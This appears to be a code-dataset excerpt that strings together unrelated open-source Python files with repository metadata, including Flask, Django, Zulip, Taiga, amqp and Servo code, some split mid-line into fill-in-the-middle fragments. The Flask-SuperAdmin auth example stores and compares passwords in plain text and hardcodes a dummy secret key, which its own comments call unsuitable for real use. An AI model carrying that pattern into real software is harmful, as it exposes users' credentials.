otherNumber = otherNumber.split(".")
otherNumber = map(int, otherNumber)
if not isinstance(netmask, (list, tuple)):
netmask = cls.asList(netmask)
complementOfNetmask = cls.bitNot(netmask)
contributedBySubnet = cls.bitAnd(oneInSubnet, netmask)
otherNumber = [0] * (len(contributedBySubnet) - len(otherNumber)) + otherNumber
contributedByNumber = cls.bitAnd(otherNumber, complementOfNetmask)
result = cls.bitOr(contributedBySubnet, contributedByNumber)
return result
if __name__ == "__main__":
print IPAddress.asList("10.123.45.67")
print IPAddress.asList((192, 168, 95, 17))
print IPAddress.asList([192, 168, 95, 17])
print IPAddress.asList(175844675)
print IPAddress.asTuple("10.123.45.67")
print IPAddress.asTuple([192, 168, 95, 17])
print IPAddress.asTuple((192, 168, 95, 17))
print IPAddress.asTuple(175844675)
print IPAddress.asString([192, 168, 95, 17])
print IPAddress.asString((192, 168, 95, 17))
print IPAddress.asString("10.123.45.67")
print IPAddress.asString(175844675)
print IPAddress.asInteger("10.123.45.67")
print IPAddress.asInteger([10,123,45,67])
print IPAddress.bitAnd("10.123.45.67", "255.255.255.0")
print IPAddress.bitOr(IPAddress.bitAnd("10.123.45.67", "255.255.255.0"), "0.0.0.1")
print IPAddress.bitNot("1.2.3.4")
print IPAddress.nameWithNumber("example", "10.123.45.67")
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=2)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=3)
print IPAddress.nameWithNumber("example", "10.123.45.67", octets=4)
print IPAddress.numberWithinSubnet("10.123.45.67", "89")
print IPAddress.numberWithinSubnet("10.123.45.67", 89)
print IPAddress.numberWithinSubnet("10.123.45.67", "89.34", netmask="255.255.0.0")
print IPAddress.numberWithinSubnet("10.123.45.67", 22818, netmask="255.255.0.0")
|
syrusakbary/Flask-SuperAdmin
|
examples/auth/auth.py
|
Python
|
bsd-3-clause
| 3,960
| 0.000253
|
from flask import Flask, url_for, redirect, render_template, request
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext i
|
mport superadmin, login, wtf
from flask.ext.superadmin.contrib import sqlamodel
from wtforms.fields import TextField, PasswordField
from wtforms.validators import Required, ValidationError
# Creat
|
e application
app = Flask(__name__)
# Create dummy secrey key so we can use sessions
app.config['SECRET_KEY'] = '123456790'
# Create in-memory database
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.sqlite'
app.config['SQLALCHEMY_ECHO'] = True
db = SQLAlchemy(app)
# Create user model. For simplicity, it will store passwords in plain text.
# Obviously that's not right thing to do in real world application.
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
login = db.Column(db.String(80), unique=True)
email = db.Column(db.String(120))
password = db.Column(db.String(64))
# Flask-Login integration
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return self.id
# Required for administrative interface
def __unicode__(self):
return self.login
# Define login and registration forms (for flask-login)
class LoginForm(wtf.Form):
login = TextField(validators=[Required()])
password = PasswordField(validators=[Required()])
def validate_login(self, field):
user = self.get_user()
if user is None:
raise ValidationError('Invalid user')
if user.password != self.password.data:
raise ValidationError('Invalid password')
def get_user(self):
return db.session.query(User).filter_by(login=self.login.data).first()
class RegistrationForm(wtf.Form):
login = TextField(validators=[Required()])
email = TextField()
password = PasswordField(validators=[Required()])
def validate_login(self, field):
if db.session.query(User).filter_by(login=self.login.data).count() > 0:
raise ValidationError('Duplicate username')
# Initialize flask-login
def init_login():
login_manager = login.LoginManager()
login_manager.setup_app(app)
# Create user loader function
@login_manager.user_loader
def load_user(user_id):
return db.session.query(User).get(user_id)
# Create customized model view class
class MyModelView(sqlamodel.ModelView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Create customized index view class
class MyAdminIndexView(superadmin.AdminIndexView):
def is_accessible(self):
return login.current_user.is_authenticated()
# Flask views
@app.route('/')
def index():
return render_template('index.html', user=login.current_user)
@app.route('/login/', methods=('GET', 'POST'))
def login_view():
form = LoginForm(request.form)
if form.validate_on_submit():
user = form.get_user()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/register/', methods=('GET', 'POST'))
def register_view():
form = RegistrationForm(request.form)
if form.validate_on_submit():
user = User()
form.populate_obj(user)
db.session.add(user)
db.session.commit()
login.login_user(user)
return redirect(url_for('index'))
return render_template('form.html', form=form)
@app.route('/logout/')
def logout_view():
login.logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
# Initialize flask-login
init_login()
# Create admin
admin = superadmin.Admin(app, 'Auth', index_view=MyAdminIndexView())
# Add view
admin.add_view(MyModelView(User, db.session))
# Create DB
db.create_all()
# Start app
app.debug = True
app.run()
|
GbalsaC/bitnamiP
|
django-wiki/wiki/plugins/attachments/wiki_plugin.py
|
Python
|
agpl-3.0
| 2,509
| 0.008768
|
# -*- coding: utf-8 -*-
from django.conf.urls.defaults import patterns, url
from django.utils.translation import ugettext_lazy as _
from wiki.core.plugins import registry
from wiki.core.plugins.base import BasePlugin
from wiki.plugins.attachments import views
from wiki.plugins.attachments import models
from wiki.plugins.attachments import settings
from wiki.plugins.attachments.markdown_extensions import AttachmentExtension
from wiki.plugins.notifications import ARTICLE_EDIT
class AttachmentPlugin(BasePlugin):
#settings_form = 'wiki.plugins.notifications.forms.SubscriptionForm'
slug = settings.SLUG
urlpatterns = patterns('',
|
url(r'^$', views.AttachmentView.as_view(), name='attachments_index'),
url(r'^search/$', views.AttachmentSearchView.as_view(), name='attachments_search'),
url(r'^add/(?P<attachment_id>\d+)/$', views.AttachmentAddView.as_view(), name='attachments_add'),
url(r'^replace/(?P<attachment_id>\d+)/$', views.AttachmentReplaceView.as_view(), name='attachments_replace'),
url(r'^history/(?P<attachment_id>\d+)/$', views.AttachmentHistoryView.as_view(), name='attachments_histo
|
ry'),
url(r'^download/(?P<attachment_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^delete/(?P<attachment_id>\d+)/$', views.AttachmentDeleteView.as_view(), name='attachments_delete'),
url(r'^download/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentDownloadView.as_view(), name='attachments_download'),
url(r'^change/(?P<attachment_id>\d+)/revision/(?P<revision_id>\d+)/$', views.AttachmentChangeRevisionView.as_view(), name='attachments_revision_change'),
)
article_tab = (_(u'Attachments'), "icon-file")
article_view = views.AttachmentView().dispatch
# List of notifications to construct signal handlers for. This
# is handled inside the notifications plugin.
notifications = [{'model': models.AttachmentRevision,
'message': lambda obj: (_(u"A file was changed: %s") if not obj.deleted else _(u"A file was deleted: %s")) % obj.get_filename(),
'key': ARTICLE_EDIT,
'created': True,
'get_article': lambda obj: obj.attachment.article}
]
markdown_extensions = [AttachmentExtension()]
def __init__(self):
#print "I WAS LOADED!"
pass
registry.register(AttachmentPlugin)
|
pexip/os-python-amqp
|
t/unit/test_utils.py
|
Python
|
lgpl-2.1
| 2,126
| 0
|
from __future__ import absolute_import, unicode_literals
from case import Mock, patch
from amqp.five import text_t
from amqp.utils import (NullHandler, bytes_to_str, coro, get_errno, get_logger,
str_to_bytes)
class test_get_errno:
def test_has_attr(self):
exc = KeyError('foo')
exc.errno = 23
assert get_errno(exc) == 23
def test_in_args(self):
exc = KeyError(34, 'foo')
exc.args = (34, 'foo')
assert get_errno(exc) == 34
def test_args_short(self):
exc =
|
KeyError(34)
assert not get_errno(exc)
def test_no_args(self):
assert not get_errno(object())
class test_coro:
def test_advances(self):
@coro
def x():
yield 1
yield 2
it = x()
|
assert next(it) == 2
class test_str_to_bytes:
def test_from_unicode(self):
assert isinstance(str_to_bytes(u'foo'), bytes)
def test_from_bytes(self):
assert isinstance(str_to_bytes(b'foo'), bytes)
def test_supports_surrogates(self):
bytes_with_surrogates = '\ud83d\ude4f'.encode('utf-8', 'surrogatepass')
assert str_to_bytes(u'\ud83d\ude4f') == bytes_with_surrogates
class test_bytes_to_str:
def test_from_unicode(self):
assert isinstance(bytes_to_str(u'foo'), text_t)
def test_from_bytes(self):
assert bytes_to_str(b'foo')
def test_support_surrogates(self):
assert bytes_to_str(u'\ud83d\ude4f') == u'\ud83d\ude4f'
class test_NullHandler:
def test_emit(self):
NullHandler().emit(Mock(name='record'))
class test_get_logger:
def test_as_str(self):
with patch('logging.getLogger') as getLogger:
x = get_logger('foo.bar')
getLogger.assert_called_with('foo.bar')
assert x is getLogger()
def test_as_logger(self):
with patch('amqp.utils.NullHandler') as _NullHandler:
m = Mock(name='logger')
m.handlers = None
x = get_logger(m)
assert x is m
x.addHandler.assert_called_with(_NullHandler())
|
JanzTam/zulip
|
zerver/views/messages.py
|
Python
|
apache-2.0
| 36,656
| 0.003492
|
from __future__ import absolute_import
from django.conf import settings
from django.core import validators
from django.core.exceptions import ValidationError
from django.db import connection
from django.db.models im
|
port Q
from zerver.dec
|
orator import authenticated_api_view, authenticated_json_post_view, \
has_request_variables, REQ, JsonableError, \
to_non_negative_int, to_non_negative_float
from django.utils.html import escape as escape_html
from django.views.decorators.csrf import csrf_exempt
from zerver.lib import bugdown
from zerver.lib.actions import recipient_for_emails, do_update_message_flags, \
compute_mit_user_fullname, compute_irc_user_fullname, compute_jabber_user_fullname, \
create_mirror_user_if_needed, check_send_message, do_update_message, \
extract_recipients
from zerver.lib.cache import generic_bulk_cached_fetch
from zerver.lib.query import last_n
from zerver.lib.response import json_success, json_error
from zerver.lib.utils import statsd
from zerver.lib.validator import \
check_list, check_int, check_dict, check_string, check_bool
from zerver.models import Message, UserProfile, Stream, Subscription, \
Recipient, UserMessage, bulk_get_recipients, get_recipient, \
get_user_profile_by_email, get_stream, valid_stream_name, \
parse_usermessage_flags, to_dict_cache_key_id, extract_message_dict, \
stringify_message_dict, \
resolve_email_to_domain, get_realm, get_active_streams, \
bulk_get_streams
import sqlalchemy
from sqlalchemy import func
from sqlalchemy.sql import select, join, column, literal_column, literal, and_, \
or_, not_, union_all, alias
import re
import ujson
from zerver.lib.rest import rest_dispatch as _rest_dispatch
rest_dispatch = csrf_exempt((lambda request, *args, **kwargs: _rest_dispatch(request, globals(), *args, **kwargs)))
# This is a Pool that doesn't close connections. Therefore it can be used with
# existing Django database connections.
class NonClosingPool(sqlalchemy.pool.NullPool):
def status(self):
return "NonClosingPool"
def _do_return_conn(self, conn):
pass
def recreate(self):
return self.__class__(creator=self._creator,
recycle=self._recycle,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
echo=self.echo,
logging_name=self._orig_logging_name,
_dispatch=self.dispatch)
sqlalchemy_engine = None
def get_sqlalchemy_connection():
global sqlalchemy_engine
if sqlalchemy_engine is None:
def get_dj_conn():
connection.ensure_connection()
return connection.connection
sqlalchemy_engine = sqlalchemy.create_engine('postgresql://',
creator=get_dj_conn,
poolclass=NonClosingPool,
pool_reset_on_return=False)
sa_connection = sqlalchemy_engine.connect()
sa_connection.execution_options(autocommit=False)
return sa_connection
@authenticated_json_post_view
def json_get_old_messages(request, user_profile):
return get_old_messages_backend(request, user_profile)
class BadNarrowOperator(Exception):
def __init__(self, desc):
self.desc = desc
def to_json_error_msg(self):
return 'Invalid narrow operator: ' + self.desc
# When you add a new operator to this, also update zerver/lib/narrow.py
class NarrowBuilder(object):
def __init__(self, user_profile, msg_id_column):
self.user_profile = user_profile
self.msg_id_column = msg_id_column
def add_term(self, query, term):
# We have to be careful here because we're letting users call a method
# by name! The prefix 'by_' prevents it from colliding with builtin
# Python __magic__ stuff.
operator = term['operator']
operand = term['operand']
negated = term.get('negated', False)
method_name = 'by_' + operator.replace('-', '_')
method = getattr(self, method_name, None)
if method is None:
raise BadNarrowOperator('unknown operator ' + operator)
if negated:
maybe_negate = not_
else:
maybe_negate = lambda cond: cond
return method(query, operand, maybe_negate)
def by_has(self, query, operand, maybe_negate):
if operand not in ['attachment', 'image', 'link']:
raise BadNarrowOperator("unknown 'has' operand " + operand)
col_name = 'has_' + operand
cond = column(col_name)
return query.where(maybe_negate(cond))
def by_in(self, query, operand, maybe_negate):
if operand == 'home':
conditions = exclude_muting_conditions(self.user_profile, [])
return query.where(and_(*conditions))
elif operand == 'all':
return query
raise BadNarrowOperator("unknown 'in' operand " + operand)
def by_is(self, query, operand, maybe_negate):
if operand == 'private':
query = query.select_from(join(query.froms[0], "zerver_recipient",
column("recipient_id") ==
literal_column("zerver_recipient.id")))
cond = or_(column("type") == Recipient.PERSONAL,
column("type") == Recipient.HUDDLE)
return query.where(maybe_negate(cond))
elif operand == 'starred':
cond = column("flags").op("&")(UserMessage.flags.starred.mask) != 0
return query.where(maybe_negate(cond))
elif operand == 'mentioned' or operand == 'alerted':
cond = column("flags").op("&")(UserMessage.flags.mentioned.mask) != 0
return query.where(maybe_negate(cond))
raise BadNarrowOperator("unknown 'is' operand " + operand)
_alphanum = frozenset(
'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
def _pg_re_escape(self, pattern):
"""
Escape user input to place in a regex
Python's re.escape escapes unicode characters in a way which postgres
fails on, u'\u03bb' to u'\\\u03bb'. This function will correctly escape
them for postgres, u'\u03bb' to u'\\u03bb'.
"""
s = list(pattern)
for i, c in enumerate(s):
if c not in self._alphanum:
if c == '\000':
s[1] = '\\000'
elif ord(c) >= 128:
# convert the character to hex postgres regex will take
# \uXXXX
s[i] = '\\u{:0>4x}'.format(ord(c))
else:
s[i] = '\\' + c
return ''.join(s)
def by_stream(self, query, operand, maybe_negate):
stream = get_stream(operand, self.user_profile.realm)
if stream is None:
raise BadNarrowOperator('unknown stream ' + operand)
if self.user_profile.realm.domain == "mit.edu":
# MIT users expect narrowing to "social" to also show messages to /^(un)*social(.d)*$/
# (unsocial, ununsocial, social.d, etc)
m = re.search(r'^(?:un)*(.+?)(?:\.d)*$', stream.name, re.IGNORECASE)
if m:
base_stream_name = m.group(1)
else:
base_stream_name = stream.name
matching_streams = get_active_streams(self.user_profile.realm).filter(
name__iregex=r'^(un)*%s(\.d)*$' % (self._pg_re_escape(base_stream_name),))
matching_stream_ids = [matching_stream.id for matching_stream in matching_streams]
recipients = bulk_get_recipients(Recipient.STREAM, matching_stream_ids).values()
cond = column("recipient_id").in_([recipient.id for recipient in recipients])
return query.where(maybe_negate(cond))
recipient = get_recipient(Recipient.STREAM, type_id=stream.id)
cond = column("recipient_id") == recipient.id
return query
|
Sveder/pyweek24
|
gamelib/platforms.py
|
Python
|
apache-2.0
| 537
| 0
|
import pygame
from pygame.colordict import THECOLORS
import data
class Platform(pygame.sprite.Sprite):
def __init__(self, width, height):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.Surface([width,
|
height])
self.image.fill(THECOLORS["green"])
self.rect = self.image.get_rect()
class Trampoline(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image = data.load_image("trampoline.png")
self.
|
rect = self.image.get_rect()
|
obimod/taiga-back
|
taiga/timeline/signals.py
|
Python
|
agpl-3.0
| 6,716
| 0.003873
|
# Copyright (C) 2014 Andrey Antukh <niwi@niwi.be>
# Copyright (C) 2014 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014 David Barragán <bameda@dbarragan.com>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _
from taiga.projects.history import services as history_services
from taiga.projects.models import Project
from taiga.users.models import User
from taiga.projects.history.choices import HistoryType
from taiga.timeline.service import (push_to_timeline,
build_user_namespace,
build_project_namespace,
extract_user_info)
# TODO: Add events to followers timeline when followers are implemented.
# TODO: Add events to project watchers timeline when project watchers are implemented.
def _push_to_timeline(*args, **kwargs):
if settings.CELERY_ENABLED:
push_to_timeline.delay(*args, **kwargs)
else:
push_to_timeline(*args, **kwargs)
def _push_to_timelines(project, user, obj, event_type, created_datetime, extra_data={}):
if project is not None:
# Actions related with a project
## Project timeline
_push_to_timeline(project, obj, event_type, created_datetime,
namespace=build_project_namespace(project),
extra_data=extra_data)
## User profile timelines
## - Me
related_people = User.objects.filter(id=user.id)
## - Owner
if hasattr(obj, "owner_id") and obj.owner_id:
related_people |= User.objects.filter(id=obj.owner_id)
## - Assigned to
if hasattr(obj, "assigned_to_id") and obj.assigned_to_id:
related_people |= User.objects.filter(id=obj.assigned_to_id)
## - Watchers
watchers = getattr(obj, "watchers", None)
if watchers:
related_people |= obj.watchers.all()
## - Exclude inactive and system users and remove duplicate
related_people = related_people.exclude(is_active=False)
related_people = related_people.exclude(is_system=True)
related_people = related_people.distinct()
_push_to_timeline(related_people, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
else:
# Actions not related with a project
## - Me
_push_to_timeline(user, obj, event_type, created_datetime,
namespace=build_user_namespace(user),
extra_data=extra_data)
def _clean_description_fields(values_diff):
# Description_diff and description_html if included can be huge, we are
# removing the html one and clearing the diff
values_diff.pop("description_html", None)
if "description_diff" in values_diff:
values_diff["description_diff"] = _("Check the history API for the exact diff")
def on_new_history_entry(sender, instance, created, **kwargs):
if instance._importing:
return
if instance.is_hidden:
return None
model = history_services.get_model_from_key(instance.key)
pk = history_services.get_pk_from_key(instance.key)
obj = model.objects.get(pk=pk)
project = obj.project
if instance.type == HistoryType.create:
event_type = "create"
elif instance.type == HistoryType.change:
event_type = "change"
elif instance.type == HistoryType.delete:
event_type = "delete"
user = User.objects.get(id=instance.user["pk"])
values_diff = instance.values_diff
_clean_description_fields(values_diff)
extra_data = {
"values_diff": values_diff,
"user": extract_user_info(user),
"comment": instance.comment,
"comment_html": instance.comment_html,
}
# Detect deleted comment
if instance.delete_comment_date:
extra_data["comment_deleted"] = True
created_datetime = instance.created_at
_push_to_timelines(project, user, obj, event_type, created_datetime, extra_data=extra_data)
def create_membership_push_to_timeline(sender, instance, **kwargs):
"""
Creating new membership with associated user. If the user is the project owner we don't
do anything because that info will be shown in created project timeline entry
@param sender: Membership model
@param instance: Membership object
"""
# We shown in created project timeline entry
if not instance.pk and instance.user and instance.user != instance.project.owner:
created_datetime = instance.created_at
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# Updating existing membership
elif instance.pk:
try:
prev_instance = sender.obj
|
ects.get(pk=instance.pk)
if instance.user != prev_instance.user:
created_datetime = timezone.now()
# The new member
_push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
# If we are updating the old user is removed from project
if prev_instance.user:
_push_to_timelines(instance.project,
|
prev_instance.user,
prev_instance,
"delete",
created_datetime)
except sender.DoesNotExist:
# This happens with some tests, when a membership is created with a concrete id
pass
def delete_membership_push_to_timeline(sender, instance, **kwargs):
if instance.user:
created_datetime = timezone.now()
_push_to_timelines(instance.project, instance.user, instance, "delete", created_datetime)
def create_user_push_to_timeline(sender, instance, created, **kwargs):
if created:
project = None
user = instance
_push_to_timelines(project, user, user, "create", created_datetime=user.date_joined)
|
sadmansk/servo
|
python/servo/bootstrap.py
|
Python
|
mpl-2.0
| 13,376
| 0.00157
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import abs
|
olute_import, print_function
from distutils
|
.spawn import find_executable
from distutils.version import LooseVersion
import json
import os
import platform
import shutil
import subprocess
from subprocess import PIPE
import servo.packages as packages
from servo.util import extract, download_file, host_triple
def install_trusty_deps(force):
version = str(subprocess.check_output(['gcc', '-dumpversion'])).split('.')
gcc = True
if int(version[0]) > 4:
gcc = False
elif int(version[0]) == 4 and int(version[1]) >= 9:
gcc = False
version = str(subprocess.check_output(['clang', '-dumpversion'])).split('.')
clang = int(version[0]) < 4
if gcc:
run_as_root(["add-apt-repository", "ppa:ubuntu-toolchain-r/test"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "gcc-4.9", "g++-4.9"], force)
run_as_root(['update-alternatives', '--install', '/usr/bin/gcc', 'gcc',
'/usr/bin/gcc-4.9', '60', '--slave', '/usr/bin/g++', 'g++',
'/usr/bin/g++-4.9'])
if clang:
run_as_root(["bash", "-c", 'wget -O - https://apt.llvm.org/llvm-snapshot.gpg.key | sudo apt-key add -'])
run_as_root(["apt-add-repository", "deb http://apt.llvm.org/trusty/ llvm-toolchain-xenial-4.0 main"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "clang-4.0"], force)
return gcc or clang
def check_gstreamer_lib():
return subprocess.call(["pkg-config", "gstreamer-1.0 >= 1.12"],
stdout=PIPE, stderr=PIPE) == 0
def run_as_root(command, force=False):
if os.geteuid() != 0:
command.insert(0, 'sudo')
if force:
command += "-y"
return subprocess.call(command)
def install_linux_deps(context, pkgs_ubuntu, pkgs_fedora, force):
install = False
pkgs = []
if context.distro == 'Ubuntu':
command = ['apt-get', 'install']
pkgs = pkgs_ubuntu
if subprocess.call(['dpkg', '-s'] + pkgs, stdout=PIPE, stderr=PIPE) != 0:
install = True
elif context.distro in ['CentOS', 'CentOS Linux', 'Fedora']:
installed_pkgs = str(subprocess.check_output(['rpm', '-qa'])).replace('\n', '|')
pkgs = pkgs_fedora
for p in pkgs:
command = ['dnf', 'install']
if "|{}".format(p) not in installed_pkgs:
install = True
break
if install:
if force:
command.append('-y')
print("Installing missing dependencies...")
run_as_root(command + pkgs)
return True
return False
def install_salt_dependencies(context, force):
pkgs_apt = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']
pkgs_dnf = ['gcc', 'libffi-devel', 'python-devel', 'openssl-devel']
if not install_linux_deps(context, pkgs_apt, pkgs_dnf, force):
print("Dependencies are already installed")
def gstreamer(context, force=False):
cur = os.curdir
gstdir = os.path.join(cur, "support", "linux", "gstreamer")
if not os.path.isdir(os.path.join(gstdir, "gstreamer", "lib")):
subprocess.check_call(["bash", "gstreamer.sh"], cwd=gstdir)
return True
return False
def bootstrap_gstreamer(context, force=False):
if not gstreamer(context, force):
print("gstreamer is already set up")
return 0
def linux(context, force=False):
# Please keep these in sync with the packages in README.md
pkgs_apt = ['git', 'curl', 'autoconf', 'libx11-dev', 'libfreetype6-dev',
'libgl1-mesa-dri', 'libglib2.0-dev', 'xorg-dev', 'gperf', 'g++',
'build-essential', 'cmake', 'python-pip',
'libbz2-dev', 'libosmesa6-dev', 'libxmu6', 'libxmu-dev', 'libglu1-mesa-dev',
'libgles2-mesa-dev', 'libegl1-mesa-dev', 'libdbus-1-dev', 'libharfbuzz-dev',
'ccache', 'clang', 'autoconf2.13']
pkgs_dnf = ['libtool', 'gcc-c++', 'libXi-devel', 'freetype-devel',
'mesa-libGL-devel', 'mesa-libEGL-devel', 'glib2-devel', 'libX11-devel',
'libXrandr-devel', 'gperf', 'fontconfig-devel', 'cabextract', 'ttmkfdir',
'python2', 'python2-virtualenv', 'python2-pip', 'expat-devel', 'rpm-build',
'openssl-devel', 'cmake', 'bzip2-devel', 'libXcursor-devel', 'libXmu-devel',
'mesa-libOSMesa-devel', 'dbus-devel', 'ncurses-devel', 'harfbuzz-devel',
'ccache', 'mesa-libGLU-devel', 'clang', 'clang-libs', 'gstreamer1-devel',
'gstreamer1-plugins-base-devel', 'gstreamer1-plugins-bad-free-devel', 'autoconf213']
if context.distro == "Ubuntu":
if context.distro_version == "17.04":
pkgs_apt += ["libssl-dev"]
elif int(context.distro_version.split(".")[0]) < 17:
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
if context.distro_version == "14.04":
pkgs_apt += ["python-virtualenv"]
else:
pkgs_apt += ["virtualenv"]
pkgs_apt += ['libgstreamer1.0-dev', 'libgstreamer-plugins-base1.0-dev',
'libgstreamer-plugins-bad1.0-dev']
elif context.distro == "Debian" and context.distro_version == "Sid":
pkgs_apt += ["libssl-dev"]
else:
pkgs_apt += ["libssl1.0-dev"]
installed_something = install_linux_deps(context, pkgs_apt, pkgs_dnf, force)
if not check_gstreamer_lib():
installed_something |= gstreamer(context, force)
if context.distro == "Ubuntu" and context.distro_version == "14.04":
installed_something |= install_trusty_deps(force)
if not installed_something:
print("Dependencies were already installed!")
return 0
def salt(context, force=False):
# Ensure Salt dependencies are installed
install_salt_dependencies(context, force)
# Ensure Salt is installed in the virtualenv
# It's not instaled globally because it's a large, non-required dependency,
# and the installation fails on Windows
print("Checking Salt installation...", end='')
reqs_path = os.path.join(context.topdir, 'python', 'requirements-salt.txt')
process = subprocess.Popen(
["pip", "install", "-q", "-I", "-r", reqs_path],
stdout=PIPE,
stderr=PIPE
)
process.wait()
if process.returncode:
out, err = process.communicate()
print('failed to install Salt via pip:')
print('Output: {}\nError: {}'.format(out, err))
return 1
print("done")
salt_root = os.path.join(context.sharedir, 'salt')
config_dir = os.path.join(salt_root, 'etc', 'salt')
pillar_dir = os.path.join(config_dir, 'pillars')
# In order to allow `mach bootstrap` to work from any CWD,
# the `root_dir` must be an absolute path.
# We place it under `context.sharedir` because
# Salt caches data (e.g. gitfs files) in its `var` subdirectory.
# Hence, dynamically generate the config with an appropriate `root_dir`
# and serialize it as JSON (which is valid YAML).
config = {
'hash_type': 'sha384',
'master': 'localhost',
'root_dir': salt_root,
'state_output': 'changes',
'state_tabular': True,
}
if 'SERVO_SALTFS_ROOT' in os.environ:
config.update({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [os.path.abspath(os.environ['SERVO_SALTFS_ROOT'])],
},
})
else:
config.update({
'fileserver_backend': ['git'],
'gitfs_env_whitelist': 'base',
'gitfs_provider': 'gitpython',
'gitfs_remotes': [
'https://github.com/servo/saltfs.git',
],
})
if not os.path.exists(config_dir):
os.makedirs(config_dir, mode=0o700)
with open(os.path.join(config_dir, 'minion'),
|
bufferapp/buffer-django-nonrel
|
tests/modeltests/validation/tests.py
|
Python
|
bsd-3-clause
| 5,944
| 0.003197
|
from django import forms
from django.test import TestCase
from django.core.exceptions import NON_FIELD_ERRORS
from modeltests.validation import ValidationTestCase
from modeltests.validation.models import Author, Article, ModelToValidate
# Import other tests for this package.
from modeltests.validation.validators import TestModelsWithValidators
from modeltests.validation.test_unique import (GetUniqueCheckTests,
PerformUniqueChecksTest)
from modeltests.validation.test_custom_messages import CustomMessagesTest
class BaseModelValidationTests(ValidationTestCase):
def test_missing_required_field_raises_error(self):
mtv = ModelToValidate(f_with_custom_validator=42)
self.assertFailsValidation(mtv.full_clean, ['name', 'number'])
def test_with_correct_value_model_validates(self):
mtv = ModelToValidate(number=10, name='Some Name')
self.assertEqual(None, mtv.full_clean())
def test_custom_validate_method(self):
mtv = ModelToValidate(number=11)
self.assertFailsValidation(mtv.full_clean, [NON_FIELD_ERRORS, 'name'])
def test_wrong_FK_value_raises_error(self):
mtv=ModelToValidate(number=10, name='Some Name', parent_id=3)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_correct_FK_value_validates(self):
parent = ModelToValidate.objects.create(number=10, name='Some Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertEqual(None, mtv.full_clean())
def test_limited_FK_raises_error(self):
# The limit_choices_to on the parent field says that a parent object's
# number attribute must be 10, so this should fail validation.
parent = ModelToValidate.objects.create(number=11, name='Other Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_wrong_email_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', email='not-an-email')
self.assertFailsValidation(mtv.full_clean, ['email'])
def test_correct_email_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', email='valid@email.com')
self.assertEqual(None, mtv.full_clean())
def test_wrong_url_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', url='not a url')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'Enter a valid value.'])
def test_correct_url_but_nonexisting_gives_404(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_url_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://www.djangoproject.com/')
self.assertEqual(None, mtv.full_clean()) # This will fail if there's no Internet connection
def test_correct_https_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='https://www.djangoproject.com/')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftp_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftp://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftps_url_but_nonexisting(self):
mtv = ModelToValidate(number=10, name='Some Name', url='ftps://ftp.google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_text_greater_that_charfields_max_length_raises_erros(self):
mtv = ModelToValidate(number=10, name='Some Name'*100)
self.assertFailsValidation(mtv.full_clean, ['name',])
class ArticleForm(forms.ModelForm):
class Meta:
model = Article
exclude = ['author']
class ModelFormsTests(TestCase):
def setUp(self):
self.author = Author.objects.create(name='Joseph Kocherhans')
def test_partial_validation(self):
# Make sure the "commit=False and set field values later" idiom still
# works with model validation.
data = {
'title': 'The state of model validation',
'pub_date': '2010-1-10 14:49:00'
}
form = ArticleForm(data)
self.assertEqual(form.errors.keys(), [])
article = form.save(commit=False)
article.author = self.author
article.save()
